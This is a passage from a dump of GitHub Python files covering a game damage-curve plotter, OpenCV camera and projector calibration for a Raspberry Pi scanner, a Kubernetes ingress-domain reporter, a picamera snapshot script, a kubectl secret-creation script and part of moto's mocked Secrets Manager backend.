'二水二宗室')\n for i in range(5, len(tx)):\n if(ty[i] >= tempy[i]):\n mintime = max(mintime, tx[i])\n break\n if(i == len(tx) - 1):\n mintime = 16\n ax.plot(tempx, tempy, c = 'pink', label = '二水二宗室')\n\n yelan.init(hp = hp, basehp = basehp, crit1 = crit1, crit2 = crit2, inc = inc + 0.15, resist = resist, ainc = 0.3, qinc = 0)\n tempx, tempy = calc(yelan, '四水')\n for i in range(5, len(tx)):\n if(ty[i] >= tempy[i]):\n mintime = max(mintime, tx[i])\n break\n if(i == len(tx) - 1):\n mintime = 16\n ax.plot(tempx, tempy, c = 'blue', label = '四水')\n\n if(mintime > 0 and mintime <= 15):\n print('绝缘4套装将在', mintime, 's赶超其他圣遗物套装')\n\n '''\n ax.tick_params(bottom = 'off', top = 'off', left = 'off', right = 'off')\n for key, spine in ax.spines.items():\n spine.set_visible(False)\n '''\n ax.legend(loc = 'upper 
right')\n ax.set_title(title)\n plt.xlabel('时间')\n plt.ylabel('伤害期望')\n fig.savefig(title + '.png', dpi = 600, format = 'png')\n\n\n\n\nWork('100充能下夜兰单人时间-伤害曲线', hp = 35645.2, basehp = 14450, crit1 = 1, crit2 = 2.242, inc = 0.666, resist = 0, ainc = 0, qinc = 0.3, Crit1 = 1, Crit2 = 2.242, HP = 35645.2)\nWork('120充能下夜兰单人时间-伤害曲线', hp = 33044.2, basehp = 14450, crit1 = 1, crit2 = 2.242, inc = 0.666, resist = 0, ainc = 0, qinc = 0.3, Crit1 = 1, Crit2 = 2.242, HP = 35645.2)\nWork('140充能下夜兰单人时间-伤害曲线', hp = 30385.4, basehp = 14450, crit1 = 1, crit2 = 2.242, inc = 0.666, resist = 0, ainc = 0, qinc = 0.35, Crit1 = 1, Crit2 = 2.242, HP = 33044.2)\nWork('160充能下夜兰单人时间-伤害曲线', hp = 29142.7, basehp = 14450, crit1 = 0.972, crit2 = 2.176, inc = 0.666, resist = 0, ainc = 0, qinc = 0.4, Crit1 = 1, Crit2 = 2.242, HP = 30385.4)\nWork('180充能下夜兰单人时间-伤害曲线', hp = 29142.7, basehp = 14450, crit1 = 0.913, crit2 = 2.057, inc = 0.666, resist = 0, ainc = 0, qinc = 0.45, Crit1 = 0.972, Crit2 = 2.176, HP = 29142.7)\n\n\nWork('100充能下夜兰组队时间-伤害曲线', hp = 35645.2 + 5346.5, basehp = 14450, crit1 = 1, crit2 = 2.242, inc = 0.666 + 0.75, resist = 0.75, ainc = 0, qinc = 0.3, Crit1 = 1, Crit2 = 2.242, HP = 35645.2 + 5346.5)\nWork('120充能下夜兰组队时间-伤害曲线', hp = 33044.2 + 5346.5, basehp = 14450, crit1 = 1, crit2 = 2.242, inc = 0.666 + 0.75, resist = 0.75, ainc = 0, qinc = 0.3, Crit1 = 1, Crit2 = 2.242, HP = 35645.2 + 5346.5)\nWork('140充能下夜兰组队时间-伤害曲线', hp = 30385.4 + 5346.5, basehp = 14450, crit1 = 1, crit2 = 2.242, inc = 0.666 + 0.75, resist = 0.75, ainc = 0, qinc = 0.35, Crit1 = 1, Crit2 = 2.242, HP = 33044.2 + 5346.5)\nWork('160充能下夜兰组队时间-伤害曲线', hp = 29142.7 + 5346.5, basehp = 14450, crit1 = 0.972, crit2 = 2.176, inc = 0.666 + 0.75, resist = 0.75, ainc = 0, qinc = 0.4, Crit1 = 1, Crit2 = 2.242, HP = 30385.4 + 5346.5)\nWork('180充能下夜兰组队时间-伤害曲线', hp = 29142.7 + 5346.5, basehp = 14450, crit1 = 0.913, crit2 = 2.057, inc = 0.666 + 0.75, resist = 0.75, ainc = 0, qinc = 0.45, Crit1 = 0.972, Crit2 = 2.176, HP = 29142.7 + 5346.5)\n","repo_name":"leimu998/E55555","sub_path":"test./1545.py","file_name":"1545.py","file_ext":"py","file_size_in_byte":7679,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"40619111327","text":"from picamera import PiCamera\nimport numpy as np\nfrom natsort import natsorted\nimport cv2 as cv\nimport glob\nimport os\nfrom .projector import Projector\nfrom scipy import ndimage\n\n\"\"\"\n Генериране на шаблони за сканиране\n\"\"\"\nclass CameraPi:\n\n CALIBRATION_DIR = \"./Camera_Calib\" # Директория съдържаща снимките за калибриране и файла с резултата\n CALIBRATION_FILE = \"/CalibResult.json\" # Файл с резултата от калибрирането\n CALIBRATION_RES_IMAGE = \"/CalibResult.jpg\" # Файл с резултата от калибрирането\n\n STEREO_CALIBRATION_DIR = \"./Stereo_Calib\" # Резултатът от стерео калибрирането се записва в главната директория\n STEREO_CALIBRATION_FILE = \"/StereoCalibResult.json\" # Файл с резултата от калибрирането\n\n # Инициализиране на необходимите параметри на камерата\n def __init__(self):\n # зареждане на вътрешните параметри на камерата\n self.cCalibrationRes = self.readCalibrationResult(self.CALIBRATION_DIR)\n # зареждане на вътрешните параметри от стерео калибрирането\n self.stereoCalibrationRes = self.readStereoCalibrationResult()\n\n \"\"\"\n Прави снимка с камерата и връща името на jpg файла.\n \"\"\"\n def takePhoto(self, dir, imageInd=\"\"):\n imageFullName = '{0}/image{1}.jpg'.format(dir,imageInd)\n print(imageFullName)\n with PiCamera() as 
camera:\n # preview е само за debug\n camera.stop_preview()\n camera.capture(imageFullName)\n camera.stop_preview()\n return imageFullName\n\n \"\"\"\n Връщане на резултат от калибрирането според подадената директория, в която ще се използва\n \"\"\"\n def getUndistortCalibrationRes(self, dir):\n calibRes = None\n # Ако е калибриране на прожектора, то се прилага калибрирането на камерата\n if dir.startswith(Projector.CALIBRATION_DIR):\n calibRes= {\n \"matrix\" : self.cCalibrationRes[\"matrix\"],\n \"distortion\" : self.cCalibrationRes[\"distortion\"],\n \"newCameraMatrix\": self.cCalibrationRes[\"newCameraMatrix\"],\n \"roi\": self.cCalibrationRes[\"roi\"]\n }\n # Ако не е калибриране на камерата или стерео, то се опитва да се приложи резултата от стерео калибрирането\n elif (not dir.startswith(self.CALIBRATION_DIR) and\n not dir.startswith(self.STEREO_CALIBRATION_DIR)):\n # При стерео калибрацията няма newCameraMatrix и се подава None\n # тогава се оправяне на изкривяването се използва само matrix\n calibRes= {\n \"matrix\" : self.stereoCalibrationRes[\"cameraMatrix\"],\n \"distortion\" : self.stereoCalibrationRes[\"cameraDistortion\"],\n \"newCameraMatrix\": None,\n \"roi\": self.stereoCalibrationRes[\"cRoi\"]\n }\n return calibRes\n\n # Зарежда и \"изправя\" изображението, ако е приложимо\n def loadImage(self, fname,flag=cv.IMREAD_COLOR):\n img = cv.imread(fname, flag)\n calibRes = self.getUndistortCalibrationRes(fname)\n\n # if calibRes != None:\n # img = self.undistortImage(img,calibRes)\n return img\n\n #Прочита изображенията за определен шаблон\n def loadPatternImages(self, dir, patternCode, scan_no, readType = cv.IMREAD_GRAYSCALE, img_no='?'):\n # Зареждат се всички изображения, които отговорят на шаблона\n # img_no - ?(точно един символ),*(0 или повече символи),конретно чисто(зарежда изображението с конкретен номер)\n imgsNames = natsorted(glob.glob('{0}/image{1}{2}{3}.jpg'.format(dir,scan_no,patternCode,img_no)))\n imgs = [] # масив със заредените изображения\n img = None\n for fname in imgsNames:\n img = self.loadImage(fname,readType)\n imgs.append(img)\n return np.array(imgs)\n\n \"\"\"\n Стерео калибриране на камерата и проектора.\n patt - шаблонът на шахматна дъска, който е бил прожектиран и заснет от камерата. Ще бъде представен\n \"като това, което вижда проектора, ако беше камера\".\n projCalibResults - зарежда се в structuredlight, защото трябва да се вземе размера на проектора за генериране на шаблон\n \"\"\"\n def stereoCalibrate(self, chessboardSize, projCalibResults):\n camCalibResults = self.cCalibrationRes\n objpoints, camImgpoints, projImgpoints = self.stereoFindChessboardCorners(chessboardSize)# Точките на дъската, в изображението на камерата и в проектора.\n\n # cv.CALIB_USE_INTRINSIC_GUESS - преизчислява cameraMatrix, cameraDistortion, projectorMatrix, projectorDistortion\n # r_matrix, t_vecs - rotation и transition между камерата и проектораl. Това основно се използва за\n # essentialMatrix, fundamentalMatrix - 3x3 матрици. Свързват съответните точки в стеро изображение. 
essentialMatrix може да се разглежда като предшественик на fundamentalMatrix\n ret, cameraMatrix, cameraDistortion, projectorMatrix, projectorDistortion, r_matrix, t_vecs, essentialMatrix, fundamentalMatrix = \\\n cv.stereoCalibrate(objpoints, camImgpoints, projImgpoints, camCalibResults[\"matrix\"], camCalibResults[\"distortion\"],\n projCalibResults[\"matrix\"], projCalibResults[\"distortion\"], tuple(camCalibResults[\"shape\"]),flags = cv.CALIB_USE_INTRINSIC_GUESS)\n\n # camRectTransMat, projRectTransMat, camProjectionMatrix, projProjectionMatrix -\n # disparityToDepthMatrix - 4x4 матрица трансформираща преспективата(Q) за преобразуване на пиксели disparity в съответните [x, y, z]\n # cRoi, pRoi - използва се изрязване само да валидната област на изображението след калибриране, но не работи вярно и дава координати (0,0),(0,0), т.е. нищо не е валидно.\n camRectTransMat, projRectTransMat, camProjectionMatrix, projProjectionMatrix, disparityToDepthMatrix, cRoi, pRoi = \\\n cv.stereoRectify(cameraMatrix, cameraDistortion, projectorMatrix, projectorDistortion, tuple(camCalibResults[\"shape\"]), r_matrix, t_vecs)\n\n # запиване на резултата от калибрирането\n stereoCalibrationRes = {\n \"cShape\" : camCalibResults[\"shape\"],\n \"pShape\" : projCalibResults[\"shape\"],\n \"cameraMatrix\": cameraMatrix,\n \"cameraDistortion\": cameraDistortion,\n \"cRoi\": cRoi,\n \"projectorMatrix\": projectorMatrix,\n \"projectorDistortion\": projectorDistortion,\n \"pRoi\": pRoi,\n \"r_matrix\": r_matrix,\n \"t_vecs\": t_vecs,\n \"disparityToDepthMatrix\": disparityToDepthMatrix\n }\n self.writeStereoCalibrationResult(stereoCalibrationRes)\n\n \"\"\"\n Калибриране на камерата.\n Източник: https://docs.opencv.org/4.x/dc/dbb/tutorial_py_calibration.html\n chessboardSize: Размерите на шаха.Трябва да са точни иначе findChessboardCorners ще върне false.\n (8,6)\n chessBlockSize: Ширина на едно кврадче от дъската\n size: Размера на изображението. Попълва се при проектора.\n !!!ВАЖНО: В снимките за калибиране трябва да са такива, при които дъската е много близо до ръба,\n защото иначе калибриране е грешно и изкривява крайното изображениета\n * https://answers.opencv.org/question/28438/undistortion-at-far-edges-of-image/\n \"\"\"\n def calibrate(self, calibrationDir, chessboardSize, chessBlockSize, size=None):\n # Критерии за спиране на търсенето. Използва се в cornerSubPix, което намира по-точно ъглите на дъската\n # (type:COUNT,EPS or COUNT + EPS(2+1),maxCount iteration,\n # epsilon: при каква точност или промяна на стойност алгоритъма спира)\n criteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n lastImageWithPattern = None #после изображение с намерен шаблон //После за тест на калибрирането\n\n # масив нули с редове #ъгли и 3 колони\n objp = np.zeros((chessboardSize[0]*chessboardSize[1],3), np.float32) #[56][3]\n # прави масива като (size*0,size*0,size*0), (size*1,size*0,size*0), (size*2,size*0,size*0) ....,(size*6,size*5,size*0)\n # един вид все едно в реалния свят са size*1,size*2,size*3,...\n # size* е реалния размер на квадрат на дъската. Така лесно се преобразуват пискели в реални дълбини\n objp[:,:2] = chessBlockSize * np.mgrid[0:chessboardSize[0],0:chessboardSize[1]].T.reshape(-1,2)\n\n # Масиви за съхранение точките на обекта и точките в избражението\n objpoints = [] # 3d point in real world space\n imgpoints = [] # 2d points in image plane.\n\n matched_pattern_cnt = 0 #брой намерени шаблони. 
Трябва да са поне 12, за да е коректно калибрирането.\n\n # взима имената на изображениета *.jpg от директорията сортирани по естествен начин\n images = natsorted(glob.glob('{0}/{1}'.format(calibrationDir,'image*.jpg')))\n for fname in images:\n print(fname)\n # Намиране на ъглите на квадратите\n ret, corners = self.findChessboardCorners(fname, chessboardSize)\n if ret == True:\n matched_pattern_cnt += 1\n lastImageWithPattern = fname\n print(\"Found pattern in \" + fname)\n # намира по-точнит�� пиксел на ъгълите(изобр.,ъгли, 1/2 от страничната\n # дължина за търсене(???), няма zeroZone,критерии за спиране)\n # corners2 = cv.cornerSubPix(gray,corners, (11,11), (-1,-1), criteria)\n # cv.drawChessboardCorners(img, (chessboardSize[0],chessboardSize[1]), corners2, ret)\n # cv.imwrite('Corners' + fname, img) #записва изображението с намерените ъгли на дъската\n\n # Добавят се координатите на ъглите. После за калибрирането\n objpoints.append(objp)\n imgpoints.append(corners)\n else:\n # @TODO: Пременно е махнато триенето на изображенията без шаблон\n pass #os.remove(fname)\n\n if lastImageWithPattern is not None and matched_pattern_cnt >= 12:\n img = self.loadImage(lastImageWithPattern)\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n # Калибриране на камерата(ъгли в обект,ъгли в изображението,размерите на изображението в обратен\n # ред(от -1)(?),без матрица на изображението,без коеф. на изкривяване)\n # return: Флаг за успех(ret), матрица на камерата(matrix), изкривяване(distortion),\n # изходен вектор на ротиране(r_matrix),изходен вектор на транслиране(t_vecs)\n ret, matrix, distortion, r_matrix, t_vecs = cv.calibrateCamera(\n objpoints, imgpoints, gray.shape[::-1], None, None)\n\n h,w = img.shape[:2] # размерите на изображението\n newCameraMatrix, roi = cv.getOptimalNewCameraMatrix(matrix,\n distortion,\n (w,h),0,(w,h))\n\n # Изчисляване на грешката\n mean_error = 0\n for i in range(len(objpoints)):\n imgpoints2, _ = cv.projectPoints(objpoints[i], r_matrix[i], t_vecs[i], matrix, distortion)\n error = cv.norm(imgpoints[i], imgpoints2, cv.NORM_L2)/len(imgpoints2)\n mean_error += error\n err = mean_error/len(objpoints)\n print( \"total error: {}\".format(err))\n # запиване на резултата от калибрирането\n calibrationRes = {\n \"shape\" : gray.shape if size is None else size, # записва се подадения ръчно размер, иначе се взима този на изображението(използва се за проектора)\n \"matrix\": matrix,\n \"distortion\": distortion,\n \"newCameraMatrix\": newCameraMatrix,\n \"roi\": roi,\n \"error\": err\n }\n self.writeCalibrationResult(calibrationDir,calibrationRes)\n\n # Прочитане на резултата от калибрирането\n calibrationRes = self.readCalibrationResult(calibrationDir)\n img = self.undistortImage(img, calibrationRes, calibrationDir)\n else:\n raise ValueError('Not enough matched patterns({0})!'.format(matched_pattern_cnt))\n\n # Намиране на ъглите на квадратите\n # return -> ret: дали са намерени ъгли, corners: координати на ъглите\n def findChessboardCorners(self, fname, chessboardSize):\n img = self.loadImage(fname, cv.IMREAD_GRAYSCALE) #чете изображението и преображуване в черно-бяло\n # Намиране на ъглите на квадратите(сиво изображение, размер на дъска, без флагове)\n # ret: дали са намерени ъгли, corners: координати на ъглите\n return cv.findChessboardCorners(img,(chessboardSize[0],chessboardSize[1]), None, 0)\n\n # Стерео намиране на ъглите на квадратите\n def stereoFindChessboardCorners(self, chessboardSize):\n # !!!ВАЖНО: горе с calibrate, има описания какво означават тези редове\n objp = 
np.zeros((chessboardSize[0]*chessboardSize[1],3), np.float32)\n objp[:,:2] = np.mgrid[0:chessboardSize[0],0:chessboardSize[1]].T.reshape(-1,2)\n objpoints = [] # 3d point in real world space\n imgpoints = [] # 2d points in image plane.\n\n # Взимане на imgpoints за камерата\n fname = natsorted(glob.glob('{0}/{1}'.format(self.STEREO_CALIBRATION_DIR,'image*.jpg')))[0]\n img = self.loadImage(fname)\n ret, corners = cv.findChessboardCorners(img,(chessboardSize[0],chessboardSize[1]), None)\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n else:\n raise ValueError('Not good image for stereo calibration!')\n camImgpoints = imgpoints\n\n # Взимане на imgpoints за проектора. Тук шаблона се представя като това, което е заснето от камерата\n img = self.loadImage(Projector.CALIBRATION_DIR + Projector.TMP_PATTERN_FILE_NAME)\n img = ndimage.rotate(img, 90) # Завъртане, защото проектора го използва вертикално, за да го покаже хоризонтално\n ret, corners = cv.findChessboardCorners(img,(chessboardSize[0],chessboardSize[1]), None)\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n else:\n raise ValueError('Not good image for stereo calibration!')\n projImgpoints = imgpoints\n\n return (objpoints, camImgpoints, projImgpoints)\n\n # Калибриране на изображението\n def undistortImage(self, img, calibrationRes, calibrationDir=None):\n # Премахване на изкривяването\n dst = cv.undistort(img, calibrationRes[\"matrix\"], calibrationRes[\"distortion\"], img.shape[:1], calibrationRes[\"matrix\"])#newCameraMatrix\n\n # СПИРА СЕ ИЗРЯЗВАНЕТО ПО ROI, ЗАЩОТО ВИНАГИ ТРЯБВА ПЪЛНОТО ИЗОБРАЖЕНИЕ\n # СЪЩО stereoRectify ВРЪЩА ВИНАГИ 0,0,0,0 И ТРЯБВА ДА СЕ ОПРАВИ, АКО ЩЕ СЕ ПРИЛАГА ИЗРЯЗВАНЕ НА НЕВАЛИДНИ ПИКСЕЛИ\n # Изрязване на изображението. Всяка стойност е масив, затова с flatten се преобразува от 2D в 1D масив\n # x,y,w,h = calibrationRes[\"roi\"].flatten().astype(int)\n # dst = dst[y:y+h, x:x+w]\n\n if calibrationDir != None:\n cv.imwrite(calibrationDir + self.CALIBRATION_RES_IMAGE, dst)\n print(\"Done!\")\n return dst\n\n \"\"\"\n Записесне на резултатите от калбирането във файл\n \"\"\"\n def writeCalibrationResult(self, calibrationDir, calibrationRes):\n # отваряне на файл за записване на резултата от калибрацията\n fs = cv.FileStorage(calibrationDir + self.CALIBRATION_FILE, cv.FILE_STORAGE_WRITE)\n # Параметри на камерата\n fs.write('shape', calibrationRes[\"shape\"])\n fs.write('matrix', calibrationRes[\"matrix\"])\n fs.write('distortion', calibrationRes[\"distortion\"])\n fs.write('newCameraMatrix', calibrationRes[\"newCameraMatrix\"])\n fs.write('roi', calibrationRes[\"roi\"])\n fs.write('error', calibrationRes[\"error\"])\n fs.release()\n\n \"\"\"\n Записесне на резултатите от stereo калбирането във файл\n \"\"\"\n def writeStereoCalibrationResult(self, stereoCalibrationRes):\n # отваряне на файл за записване на резултата от калибрацията\n fs = cv.FileStorage(self.STEREO_CALIBRATION_DIR + self.STEREO_CALIBRATION_FILE, cv.FILE_STORAGE_WRITE)\n # Параметри на камерата\n fs.write('cShape', stereoCalibrationRes[\"cShape\"])\n fs.write('pShape', stereoCalibrationRes[\"pShape\"])\n fs.write('cameraMatrix', stereoCalibrationRes[\"cameraMatrix\"])\n fs.write('cameraDistortion', stereoCalibrationRes[\"cameraDistortion\"])\n fs.write('cRoi', stereoCalibrationRes[\"cRoi\"])\n fs.write('projectorMatrix', stereoCalibrationRes[\"projectorMatrix\"])\n fs.write('projectorDistortion', stereoCalibrationRes[\"projectorDistortion\"])\n fs.write('pRoi', stereoCalibrationRes[\"pRoi\"])\n 
fs.write('r_matrix', stereoCalibrationRes[\"r_matrix\"])\n fs.write('t_vecs', stereoCalibrationRes[\"t_vecs\"])\n fs.write('disparityToDepthMatrix', stereoCalibrationRes[\"disparityToDepthMatrix\"])\n fs.release()\n\n \"\"\"\n Прочитане на резултатите от калбирането\n \"\"\"\n def readCalibrationResult(self, calibrationDir):\n calibResulPath = calibrationDir + self.CALIBRATION_FILE\n file_exists = os.path.exists(calibResulPath)\n\n calibrationRes = None\n if file_exists:\n # отваряне на файл за записване на резултата от калибрацията\n fs = cv.FileStorage(calibResulPath, cv.FILE_STORAGE_READ)\n # Параметри на камерата\n calibrationRes = {\n \"shape\" : tuple(fs.getNode('shape').mat().astype(int).flatten()),\n \"matrix\" : fs.getNode('matrix').mat(),\n \"distortion\" : fs.getNode('distortion').mat(),\n \"newCameraMatrix\" : fs.getNode('newCameraMatrix').mat(),\n \"roi\" : fs.getNode('roi').mat(),\n \"error\" : fs.getNode('error').real()\n }\n return calibrationRes\n\n \"\"\"\n Прочитане на резултатите от stereo калбирането\n \"\"\"\n def readStereoCalibrationResult(self):\n stereoCalibResulPath = self.STEREO_CALIBRATION_DIR + self.STEREO_CALIBRATION_FILE\n file_exists = os.path.exists(stereoCalibResulPath)\n\n stereoCalibrationRes = None\n if file_exists:\n # отваряне на файл за записване на резултата от калибрацията\n fs = cv.FileStorage(stereoCalibResulPath, cv.FILE_STORAGE_READ)\n # Параметри на камерата\n stereoCalibrationRes = {\n \"cShape\" : tuple(fs.getNode('cShape').mat().astype(int).flatten()),\n \"pShape\" : tuple(fs.getNode('pShape').mat().astype(int).flatten()),\n \"cameraMatrix\" : fs.getNode('cameraMatrix').mat(),\n \"cameraDistortion\" : fs.getNode('cameraDistortion').mat(),\n \"cRoi\" : fs.getNode('cRoi').mat(),\n \"projectorMatrix\" : fs.getNode('projectorMatrix').mat(),\n \"projectorDistortion\" : fs.getNode('projectorDistortion').mat(),\n \"pRoi\" : fs.getNode('pRoi').mat(),\n \"r_matrix\" : fs.getNode('r_matrix').mat(),\n \"t_vecs\" : fs.getNode('t_vecs').mat(),\n \"disparityToDepthMatrix\" : fs.getNode('disparityToDepthMatrix').mat()\n }\n return stereoCalibrationRes\n","repo_name":"ElitsaVenchova/Scan-y","sub_path":"Scan-y/structuredlight/cameraPi.py","file_name":"cameraPi.py","file_ext":"py","file_size_in_byte":23461,"program_lang":"python","lang":"bg","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"71498418052","text":"#!/usr/bin/env python3\n\nimport logging\nimport time\nimport requests\nimport os\nfrom kubernetes import client, config, watch\n\n\nVERSION = '0.0.1'\nSSLSUPERVISOR_CLUSTER_NAME = os.getenv('SSLSUPERVISOR_CLUSTER_NAME')\nSSLSUPERVISOR_API_KEY = os.getenv('SSLSUPERVISOR_API_KEY')\nWAIT_TIME = 300\n\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nif __name__ == \"__main__\":\n logger.info('Starting...')\n\n logger.info('Loading Kubernetes Config')\n\n config.load_incluster_config()\n\n api_client = client.ApiClient()\n api_instance = client.NetworkingV1Api(api_client)\n\n while True:\n logger.info('Listing ingresses')\n ingress_response = api_instance.list_ingress_for_all_namespaces()\n \n domains = []\n for ingress in ingress_response.items:\n for rule in ingress.spec.rules:\n domains.append(rule.host)\n\n logger.info('Listing ingresses done')\n logger.info(domains)\n\n try:\n r = requests.post(\n 'https://sslsupervisor.api.apocode.io/api/v1/identity/integrations/kubernetes/callback',\n json={\n 'kubernetes_cluster_name': os.getenv('SSLSUPERVISOR_CLUSTER_NAME'),\n 'kubernetes_data': 
domains,\n 'kubernetes_integration_version': VERSION,\n },\n headers = {\n 'X-Apo-Api-Key': os.getenv('SSLSUPERVISOR_API_KEY'),\n }\n )\n logger.info(r.json())\n r.raise_for_status()\n\n logger.info(f'Done!')\n\n except Exception as e:\n logger.error(e)\n logger.info(f'Failed. See error above.')\n\n\n logger.info(f'Waiting {WAIT_TIME} second before next update...')\n time.sleep(WAIT_TIME)\n \n","repo_name":"ApocodeHQ/sslsupervisor-kubernetes-collector","sub_path":"src/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7627684338","text":"import picamera\nimport time\n#camera = picamera.PiCamera()\n#Setup camera such as it closes when we are done with it.\nprint(\"Picture about to be taken\")\nseconds = time.time()\nmypic = open('/home/pi/scripts/images/image_'+str(time)+'.jpg','wb')\nwith picamera.PiCamera() as camera:\n camera.resolution = (1280,720)\n camera.start_preview()\n #camera warm up time\n time.sleep(2)\n camera.capture(mypic);\n\nmypic.close()\nprint(\"picture taken\")\n","repo_name":"vmishra2018/hes-e90","sub_path":"src/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74864446534","text":"import subprocess\nfrom datetime import datetime\n\nnamespaces = [\"\"]\n\ndef get_namespace_uid(namespace):\n try:\n result = subprocess.run(['kubectl', 'get', 'namespace', namespace, '-o', 'jsonpath={.metadata.uid}'], capture_output=True, text=True, check=True)\n namespace_uid = result.stdout.strip()\n return namespace_uid\n except subprocess.CalledProcessError as e:\n print(f\"Error getting UID for namespace {namespace}: {e}\")\n return None\n\ndef create_secret(namespace, secret_name, secret_data):\n try:\n subprocess.run(['kubectl', 'create', 'secret', 'generic', secret_name, '--from-literal=token='+secret_data, '--namespace='+namespace], check=True)\n print(f\"Secret {secret_name} created in namespace {namespace}\")\n except subprocess.CalledProcessError as e:\n print(f\"Error creating secret {secret_name} in namespace {namespace}: {e}\")\n\ndef apply_commands_in_each_namespace(namespaces):\n for namespace in namespaces:\n namespace_uid = get_namespace_uid(namespace)\n if namespace_uid:\n current_date = datetime.now()\n secret_name = f\"{namespace}-token-{current_date.strftime('%m-%Y')}\"\n secret_data = f\"some-random-token-{namespace_uid}\"\n create_secret(namespace, secret_name, secret_data)\n\nif __name__ == \"__main__\":\n # List of Kubernetes namespaces\n kubernetes_namespaces = ['fa', 'fl', 'lo', 'mr', 'w', 'ds']\n\n apply_commands_in_each_namespace(kubernetes_namespaces)\n\n","repo_name":"inkstom/go-token","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72118788613","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport time\nimport json\nimport uuid\nimport datetime\n\nfrom boto3 import Session\n\nfrom moto.core import BaseBackend, BaseModel\nfrom .exceptions import (\n SecretNotFoundException,\n SecretHasNoValueException,\n InvalidParameterException,\n ResourceExistsException,\n ResourceNotFoundException,\n InvalidRequestException,\n ClientError,\n)\nfrom .utils import random_password, secret_arn, get_secret_name_from_arn\nfrom 
.list_secrets.filters import all, tag_key, tag_value, description, name\n\n\n_filter_functions = {\n \"all\": all,\n \"name\": name,\n \"description\": description,\n \"tag-key\": tag_key,\n \"tag-value\": tag_value,\n}\n\n\ndef filter_keys():\n return list(_filter_functions.keys())\n\n\ndef _matches(secret, filters):\n is_match = True\n\n for f in filters:\n # Filter names are pre-validated in the resource layer\n filter_function = _filter_functions.get(f[\"Key\"])\n is_match = is_match and filter_function(secret, f[\"Values\"])\n\n return is_match\n\n\nclass SecretsManager(BaseModel):\n def __init__(self, region_name, **kwargs):\n self.region = region_name\n\n\nclass FakeSecret:\n def __init__(\n self,\n region_name,\n secret_id,\n secret_string=None,\n secret_binary=None,\n description=None,\n tags=[],\n version_id=None,\n version_stages=None,\n ):\n self.secret_id = secret_id\n self.name = secret_id\n self.arn = secret_arn(region_name, secret_id)\n self.secret_string = secret_string\n self.secret_binary = secret_binary\n self.description = description\n self.tags = tags\n self.version_id = version_id\n self.version_stages = version_stages\n self.rotation_enabled = False\n self.rotation_lambda_arn = \"\"\n self.auto_rotate_after_days = 0\n self.deleted_date = None\n\n def update(self, description=None, tags=[]):\n self.description = description\n self.tags = tags\n\n def set_versions(self, versions):\n self.versions = versions\n\n def set_default_version_id(self, version_id):\n self.default_version_id = version_id\n\n def reset_default_version(self, secret_version, version_id):\n # remove all old AWSPREVIOUS stages\n for old_version in self.versions.values():\n if \"AWSPREVIOUS\" in old_version[\"version_stages\"]:\n old_version[\"version_stages\"].remove(\"AWSPREVIOUS\")\n\n # set old AWSCURRENT secret to AWSPREVIOUS\n previous_current_version_id = self.default_version_id\n self.versions[previous_current_version_id][\"version_stages\"] = [\"AWSPREVIOUS\"]\n\n self.versions[version_id] = secret_version\n self.default_version_id = version_id\n\n def delete(self, deleted_date):\n self.deleted_date = deleted_date\n\n def restore(self):\n self.deleted_date = None\n\n def is_deleted(self):\n return self.deleted_date is not None\n\n def to_short_dict(self, include_version_stages=False):\n dct = {\n \"ARN\": self.arn,\n \"Name\": self.name,\n \"VersionId\": self.default_version_id,\n }\n if include_version_stages:\n dct[\"VersionStages\"] = self.version_stages\n return json.dumps(dct)\n\n def to_dict(self):\n version_id_to_stages = self._form_version_ids_to_stages()\n\n return {\n \"ARN\": self.arn,\n \"Name\": self.name,\n \"Description\": self.description or \"\",\n \"KmsKeyId\": \"\",\n \"RotationEnabled\": self.rotation_enabled,\n \"RotationLambdaARN\": self.rotation_lambda_arn,\n \"RotationRules\": {\"AutomaticallyAfterDays\": self.auto_rotate_after_days},\n \"LastRotatedDate\": None,\n \"LastChangedDate\": None,\n \"LastAccessedDate\": None,\n \"DeletedDate\": self.deleted_date,\n \"Tags\": self.tags,\n \"VersionIdsToStages\": version_id_to_stages,\n \"SecretVersionsToStages\": version_id_to_stages,\n }\n\n def _form_version_ids_to_stages(self):\n version_id_to_stages = {}\n for key, value in self.versions.items():\n version_id_to_stages[key] = value[\"version_stages\"]\n\n return version_id_to_stages\n\n\nclass SecretsStore(dict):\n def __setitem__(self, key, value):\n new_key = get_secret_name_from_arn(key)\n super(SecretsStore, self).__setitem__(new_key, value)\n\n def 
__getitem__(self, key):\n new_key = get_secret_name_from_arn(key)\n return super(SecretsStore, self).__getitem__(new_key)\n\n def __contains__(self, key):\n new_key = get_secret_name_from_arn(key)\n return dict.__contains__(self, new_key)\n\n def pop(self, key, *args, **kwargs):\n new_key = get_secret_name_from_arn(key)\n return super(SecretsStore, self).pop(new_key, *args, **kwargs)\n\n\nclass SecretsManagerBackend(BaseBackend):\n def __init__(self, region_name=None, **kwargs):\n super(SecretsManagerBackend, self).__init__()\n self.region = region_name\n self.secrets = SecretsStore()\n\n def reset(self):\n region_name = self.region\n self.__dict__ = {}\n self.__init__(region_name)\n\n def _is_valid_identifier(self, identifier):\n return identifier in self.secrets\n\n def _unix_time_secs(self, dt):\n epoch = datetime.datetime.utcfromtimestamp(0)\n return (dt - epoch).total_seconds()\n\n def get_secret_value(self, secret_id, version_id, version_stage):\n if not self._is_valid_identifier(secret_id):\n raise SecretNotFoundException()\n\n if not version_id and version_stage:\n # set version_id to match version_stage\n versions_dict = self.secrets[secret_id].versions\n for ver_id, ver_val in versions_dict.items():\n if version_stage in ver_val[\"version_stages\"]:\n version_id = 